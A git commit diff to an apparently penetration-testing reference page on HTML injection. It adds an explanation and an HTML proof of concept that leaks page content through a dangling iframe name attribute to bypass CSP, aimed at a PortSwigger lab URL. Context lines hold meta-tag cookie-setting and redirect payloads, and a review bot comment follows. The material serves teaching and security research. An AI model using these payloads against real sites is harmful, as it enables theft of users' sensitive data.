GitBook: [#3307] No subject
This commit is contained in:
parent
b1dfcc0701
commit
48b89e1c52
@ -221,6 +221,21 @@ Notice that a **child document can view and set location property for parent, ev
|
||||
|
||||
This can be mitigated with something like: _**sandbox=’ allow-scripts allow-top-navigation’**_
|
||||
|
||||
An iframe can also be abused to leak sensitive information from a different page **using the iframe name attribute**. This is because you can create an iframe that iframes itself abusing the HTML injection that makes the **sensitive info appear inside the iframe name attribute** and then access that name from the initial iframe and leak it.
|
||||
|
||||
```html
|
||||
<script>
|
||||
function cspBypass(win) {
|
||||
win[0].location = 'about:blank';
|
||||
setTimeout(()=>alert(win[0].name), 500);
|
||||
}
|
||||
</script>
|
||||
|
||||
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
|
||||
```
|
||||
|
||||
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
|
||||
|
||||
### \<meta abuse
|
||||
|
||||
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
|
||||
|
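Review bot: The added paragraph ahead of the `html` block says the sensitive info will "appear inside the iframe name attribute" but never says why, and the sample leaves its two key lines unexplained, so a reader cannot tell what has to be fixed on the affected page. State that the injected `<iframe name=%27` in the `email` parameter leaves the `name` quote unclosed, so the markup that follows it in the response becomes the frame name, and add a comment on `win[0].location = 'about:blank';` saying why the nested frame is navigated before `win[0].name` is read. The function is called `cspBypass` and the linked article is about CSP, yet the new text never mentions CSP; one sentence on which restriction this gets around would close that gap. Unlike the sandbox line just above, the addition carries no mitigation; a short note that encoding the reflected `email` value removes the injection would fit the section. The fixed 500 in `setTimeout` is a guess at load time and deserves a comment as well.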